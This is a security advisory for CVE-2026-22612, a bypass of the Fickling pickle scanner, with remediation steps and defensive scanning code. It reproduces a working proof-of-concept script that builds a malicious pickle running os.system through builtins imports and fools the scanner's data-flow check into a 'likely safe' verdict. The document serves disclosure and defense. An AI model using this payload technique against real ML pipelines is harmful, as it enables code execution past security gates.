CVE-2026-22612: fickling: Deserialization enables RCE

GHSA-h4rm-mm56-xf63 HIGH PoC AVAILABLE CISA: ATTEND
Published January 9, 2026
CISO Take

Fickling is widely used as a security gate to validate pickle files before loading ML models and datasets. This bypass means any pipeline relying on Fickling <= 0.1.6 can be silently evaded by crafted payloads that execute arbitrary code while returning a 'LIKELY_SAFE' verdict. Patch to 0.1.7 immediately and treat any prior Fickling LIKELY_SAFE verdicts as untrusted until re-scanned.

Risk Assessment

HIGH. The vulnerability is in a security control itself — Fickling is deployed specifically to catch malicious pickle files in ML pipelines. A working PoC is public, exploitability is moderate (requires pickle internals knowledge but no AI expertise), and the attack achieves full RCE while actively deceiving the scanner's data flow analysis. Impact is highest for organizations using Fickling as a sole gating control for model or dataset ingestion. EPSS is low today but PoC availability accelerates weaponization.

Affected Systems

Package | Ecosystem | Vulnerable Range | Patched
fickling | pip | <= 0.1.6 | 0.1.7

Do you use fickling? You're affected.
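One quick way to check exposure in a Python environment is to compare the installed version against the patched release. A minimal stdlib-only sketch (the helper names are ours, and a production check would use `packaging.version` for robust comparison):

```python
from importlib import metadata


def version_is_vulnerable(version: str) -> bool:
    """True if a fickling version string falls in the vulnerable range (<= 0.1.6)."""
    parts = tuple(int(p) for p in version.split(".")[:3])
    return parts <= (0, 1, 6)


def fickling_is_vulnerable() -> bool:
    """True if the fickling installed in this environment is affected."""
    try:
        return version_is_vulnerable(metadata.version("fickling"))
    except metadata.PackageNotFoundError:
        return False  # not installed, so not affected
```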

Severity & Risk

CVSS 3.1
N/A
EPSS
0.1%
chance of exploitation in 30 days
Higher than 21% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Moderate
Exploitation Confidence
medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Recommended Action

5 steps
  1. PATCH

    Upgrade fickling to >= 0.1.7 immediately. The fix emits AST import nodes for dangerous builtins functions so the security analysis can match them.

  2. AUDIT

    Re-scan any pickle files previously cleared as LIKELY_SAFE by Fickling <= 0.1.6 — verdicts cannot be trusted retroactively.

  3. DEFENSE-IN-DEPTH: Never load pickle files from untrusted sources regardless of scanner verdict. Adopt safer serialization formats where possible: SafeTensors for model weights, ONNX for model exchange, JSON/Parquet for datasets.

  4. SANDBOX

    If pickle loading is unavoidable, run deserialization in isolated sandboxed environments (restricted namespaces, seccomp, containers) where OS-level calls fail even if payload executes.

  5. DETECT

    Search CI/CD and MLOps pipeline logs for Fickling LIKELY_SAFE verdicts on externally sourced pickle files as an indicator of potential exposure.
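The AUDIT and DETECT steps can be approximated without Fickling at all: Python's stdlib `pickletools` exposes the raw opcode stream, so scanning for GLOBAL opcodes that reference dangerous modules catches this bypass at the bytecode level, before any AST is built. A minimal sketch (the `flag_pickle` helper and `DANGEROUS_MODULES` set are illustrative, not part of any library; note that STACK_GLOBAL in protocol 2+ resolves module/name from the stack, so a production scanner must also track preceding string pushes):

```python
import pickletools
from typing import List

# Modules whose import inside a pickle should always be treated as hostile.
DANGEROUS_MODULES = {"__builtin__", "__builtins__", "builtins", "os", "subprocess"}


def flag_pickle(data: bytes) -> List[str]:
    """Return the dangerous `module.name` globals referenced by a pickle.

    Works on the raw opcode stream, so it sees GLOBAL opcodes even when an
    AST-level tool (like Fickling <= 0.1.6) silently drops builtins imports.
    """
    findings = []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name == "GLOBAL":
            # For GLOBAL, genops yields the argument as "module name".
            module, _, name = arg.partition(" ")
            if module in DANGEROUS_MODULES:
                findings.append(f"{module}.{name}")
    return findings
```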

CISA SSVC Assessment

Decision Attend
Exploitation poc
Automatable Yes
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, Robustness and Cybersecurity Article 9 - Risk Management System
ISO 42001
A.6.2.3 - AI System Security A.8.5 - AI System Supplier Relationships
NIST AI RMF
MANAGE 2.4 - Residual risks are managed MAP 3.1 - Risks associated with AI system deployment and use are identified
OWASP LLM Top 10
LLM03:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2026-22612?

CVE-2026-22612 is a security-analysis bypass in Fickling, a scanner widely used as a gate to validate pickle files before loading ML models and datasets. Crafted payloads can execute arbitrary code while Fickling <= 0.1.6 returns a 'LIKELY_SAFE' verdict, so any pipeline relying on it can be silently evaded. Patch to 0.1.7 immediately and treat any prior Fickling LIKELY_SAFE verdicts as untrusted until re-scanned.

Is CVE-2026-22612 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2026-22612, increasing the risk of exploitation.

How to fix CVE-2026-22612?

1. PATCH: Upgrade fickling to >= 0.1.7 immediately. The fix emits AST import nodes for dangerous builtins functions. 2. AUDIT: Re-scan any pickle files previously cleared as LIKELY_SAFE by Fickling <= 0.1.6 — verdicts cannot be trusted retroactively. 3. DEFENSE-IN-DEPTH: Never load pickle files from untrusted sources regardless of scanner verdict; adopt safer serialization formats where possible (SafeTensors for model weights, ONNX for model exchange, JSON/Parquet for datasets). 4. SANDBOX: If pickle loading is unavoidable, run deserialization in isolated sandboxed environments (restricted namespaces, seccomp, containers) where OS-level calls fail even if the payload executes. 5. DETECT: Search CI/CD and MLOps pipeline logs for Fickling LIKELY_SAFE verdicts on externally sourced pickle files as an indicator of potential exposure.

What systems are affected by CVE-2026-22612?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, MLOps pipelines, model validation gates, dataset ingestion pipelines.

What is the CVSS score for CVE-2026-22612?

No CVSS score has been assigned yet.

Technical Details

NVD Description

# Fickling's assessment

Fickling started emitting AST nodes for builtins imports in order to match them during analysis (https://github.com/trailofbits/fickling/commit/9f309ab834797f280cb5143a2f6f987579fa7cdf).

# Original report

### Summary

Fickling works by: Pickle bytecode --> AST --> Security analysis. However, while going from bytecode to AST, some import nodes are removed, which blinds the security analysis.

fickling/fickling/fickle.py

```python
def run(self, interpreter: Interpreter):
    module, attr = self.module, self.attr
    if module in ("__builtin__", "__builtins__", "builtins"):
        # no need to emit an import for builtins!
        pass
    else:
        alias = ast.alias(attr)
        interpreter.module_body.append(ast.ImportFrom(module=module, names=[alias], level=0))
    interpreter.stack.append(ast.Name(attr, ast.Load()))

def encode(self) -> bytes:
    return f"c{self.module}\n{self.attr}\n".encode()
```

Here we see that no import nodes are emitted for builtins. However, builtins is marked as an unsafe import:

fickling/fickling/analysis.py

```python
UNSAFE_MODULES = {
    "__builtin__": "This module contains dangerous functions that can execute arbitrary code.",
    "__builtins__": "This module contains dangerous functions that can execute arbitrary code.",
    "builtins": "This module contains dangerous functions that can execute arbitrary code.",
```

But because there are no import nodes for builtins (they weren't emitted when making the AST), the security scanner is effectively blind. This can allow for security bypasses like this poc.py (script to create the payload):

```python
GLOBAL = b'c'        # Import module.name
STRING = b'S'        # Push string
TUPLE1 = b'\x85'     # Build tuple of 1
TUPLE2 = b'\x86'     # Build tuple of 2
EMPTY_TUPLE = b')'
REDUCE = b'R'        # Call function
PUT = b'p'           # Memoize (variable assignment)
GET = b'g'           # Load from memo (variable usage)
POP = b'0'           # Discard top of stack
EMPTY_DICT = b'}'
SETITEM = b's'       # Add key/value to dict
BUILD = b'b'         # Update object state (liveness satisfy)
STOP = b'.'          # Finish and return stack top


def generate_raw_payload():
    payload = b""
    payload += GLOBAL + b"builtins\n__import__\n"
    payload += STRING + b"'os'\n"
    payload += TUPLE1 + REDUCE
    payload += PUT + b"0\n"            # _var0 = os module
    payload += POP
    payload += GLOBAL + b"builtins\ngetattr\n"
    payload += GET + b"0\n"            # os module
    payload += STRING + b"'system'\n"
    payload += TUPLE2 + REDUCE
    payload += PUT + b"1\n"            # _var1 = os.system
    payload += POP
    payload += GET + b"1\n"            # os.system
    payload += STRING + b"'whoami'\n"  # COMMAND
    payload += TUPLE1 + REDUCE
    payload += PUT + b"2\n"
    payload += POP
    payload += GLOBAL + b"builtins\nException\n"
    payload += EMPTY_TUPLE + REDUCE
    payload += PUT + b"3\n"
    payload += EMPTY_DICT
    payload += STRING + b"'rce_status'\n"
    payload += GET + b"2\n"
    payload += SETITEM
    payload += BUILD
    payload += STOP
    return payload


if __name__ == "__main__":
    data = generate_raw_payload()
    with open("raw_bypass.pkl", "wb") as f:
        f.write(data)
    print("Generated 'raw_bypass.pkl'")
```

This creates a pickle file which imports the os module using __import__, which is part of builtins. If the security scanner weren't blinded, it would have been flagged immediately. However, Fickling now sees the pickle payload as:

```python
_var0 = __import__('os')
_var1 = getattr(_var0, 'system')
_var2 = _var1('whoami')
_var3 = Exception()
_var4 = _var3
_var4.__setstate__({'rce_status': _var2})
result0 = _var4
```

[Screenshot: Fickling's decompiled output for the payload, with no mention of builtins]

As you can see, there is no mention of builtins anywhere, so it isn't flagged.

Additionally, the payload builder uses a technique to ensure that no variable gets flagged as "UNUSED". We deceive the data flow analysis heuristic by using the BUILD opcode to update an object's internal state. By taking the result of os.system (the exit code) and using it as a value in a dictionary that is then "built" into a returned Exception object, we create a logical dependency chain.

The end result is that the malicious pickle gets classified as LIKELY_SAFE.

Fixes: Ensure that import nodes are emitted for imports from builtins depending on what those imports are — e.g., emit import nodes for dangerous functions like ```__import__``` while not emitting them for things like ```dict()```.
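The report's fix targets Fickling itself, but the load side can be hardened independently: `pickle.Unpickler.find_class` is invoked for every GLOBAL/STACK_GLOBAL resolution, so an allowlisting unpickler blocks this class of payload even when a scanner has been deceived. A minimal sketch (the allowlist contents and helper names are illustrative):

```python
import io
import pickle


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that only resolves an explicit allowlist of globals."""

    ALLOWED = {
        ("collections", "OrderedDict"),
        # add the classes your models legitimately need here
    }

    def find_class(self, module, name):
        # Called for every GLOBAL/STACK_GLOBAL opcode -- including the
        # builtins.__import__ / builtins.getattr chain used by the PoC.
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global: {module}.{name}")


def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()
```

This follows the restriction pattern documented for the pickle module; it limits which globals a pickle may reference but does not make loading arbitrary pickles safe in general, so it complements rather than replaces scanning and sandboxing.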

Exploitation Scenario

An adversary targeting an MLOps pipeline that pulls models from a public registry or shared storage crafts a malicious .pkl file using the disclosed PoC technique. The payload uses builtins.__import__ and builtins.getattr to construct an os.system() call, then chains the result through a BUILD opcode into an Exception object to satisfy Fickling's data flow liveness checks — no variable appears unused. When the organization's pipeline scans the file with Fickling <= 0.1.6, the scanner returns LIKELY_SAFE because builtins imports are never emitted as AST nodes and the UNSAFE_MODULES check never fires. The pipeline gates pass the model through to the inference server, which deserializes the pickle and executes the adversary's command with the server's privileges — establishing a foothold in the ML serving infrastructure.

Timeline

Published
January 9, 2026
Last Modified
January 11, 2026
First Seen
March 24, 2026

Related Vulnerabilities